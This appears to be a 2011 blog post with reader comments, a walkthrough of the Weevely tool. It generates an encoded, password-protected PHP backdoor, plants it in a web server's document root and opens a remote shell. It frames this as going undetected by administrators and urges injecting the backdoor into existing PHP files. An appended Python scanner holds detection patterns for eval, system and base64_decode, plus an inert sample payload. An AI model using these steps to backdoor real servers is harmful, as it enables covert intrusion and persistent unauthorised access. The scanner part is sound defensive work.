2011
09.12

Ever wanted to access your backdoor undetected? Well, maybe not all web administrators examine their PHP files :)

Weevely is the answer. Just follow these steps (I was doing this on Backtrack 5; take a look at the characters in orange ;) ):

root@bt:~# cd /pentest/backdoors/web/weevely
root@bt:/pentest/backdoors/web/weevely# ./main.py -g -p bD_p4ss -o bd.php

Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

+ Backdoor file ‘bd.php’ created with password ‘bD_p4ss’.
root@bt:/pentest/backdoors/web/weevely#

Where
-p = your password to access the backdoor
-g = generate a new “encrypted” PHP file (the file isn’t actually encrypted, only encoded)
-o = specify your output file

Now you have a new “encrypted” PHP file called bd.php. So how does it work?
You can put this script in the web server’s document root.

Now take a look at what happens when I put the script there and access it:
root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://10.10.10.10/bd.php -p bD_p4ss

Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/

+ Using method ‘system()’.
+ Retrieving terminal basic environment variables .

[www-data@gw /var/www] id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[www-data@gw /var/www] pwd
/var/www
[www-data@gw /var/www]

Voila! We’ve got a non-interactive shell!
Weevely can also easily be deployed inside any PHP file, but you should pay attention to where the script is injected. Be creative :)
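
What an administrator who does examine the PHP files could run over the document root, as an added example that is not part of the original post or of Weevely: a heuristic scanner for encoded payloads combined with code-execution calls. The regexes, the 4.5-bit entropy threshold and the sample strings are assumptions; they are generic obfuscation indicators, not a signature of Weevely's output.

```python
import math
import os
import re
from collections import Counter

HEURISTICS = {
    # Calls that run PHP code or OS commands (the session above reports "Using method 'system()'").
    "exec-call": re.compile(r"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\(", re.I),
    # Calls commonly used to unpack an encoded payload before it runs.
    "decode-call": re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    # A string held in a variable and then invoked as a function: $f(...).
    "variable-call": re.compile(r"\$\w+\s*\("),
}
# Quoted literals of 40+ characters with no whitespace, quotes or backslashes.
LONG_LITERAL = re.compile(r"""(["'])([^"'\\\s]{40,})\1""")
ENTROPY_BITS = 4.5  # assumed threshold: hex digests cannot exceed 4.0 bits per character
# Constructed samples with inert filler, not taken from any real backdoor.
SAMPLE_SUSPECT = "<?php $p = 'QWxhZGRpbjpvcGVuIHNlc2FtZTEyMzQ1Njc4OTBhYmNkZWZnaGlqa2w='; eval(base64_decode($p)); ?>"
SAMPLE_BENIGN = '<?php $digest = "da39a3ee5e6b4b0d3255bfef95601890afd80709"; exec("convert in.png out.jpg"); ?>'


def entropy(text):
    """Shannon entropy of text in bits per character."""
    counts = Counter(text)
    return -sum(n / len(text) * math.log2(n / len(text)) for n in counts.values())


def indicators(source):
    """Return the names of the heuristics that fire on one PHP source string."""
    found = [name for name, pattern in HEURISTICS.items() if pattern.search(source)]
    if any(entropy(m.group(2)) >= ENTROPY_BITS for m in LONG_LITERAL.finditer(source)):
        found.append("encoded-literal")
    return found


def scan_tree(root, minimum=2):
    """Map each .php file under root that trips at least `minimum` heuristics to its indicators."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as handle:
                    hits = indicators(handle.read())
                if len(hits) >= minimum:
                    report[path] = hits
    return report
```

Because the check reads file contents rather than file names, it also covers code injected into an existing PHP file. Single indicators are common in legitimate code, so hits need manual review.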

2 comments so far

  1. Nice post :)
    but unfortunately Weevely couldn’t bypass the server that turns on the safe_mode :D

    • Yes it is, but you can implement your bypass safe_mode script with Weevely ;)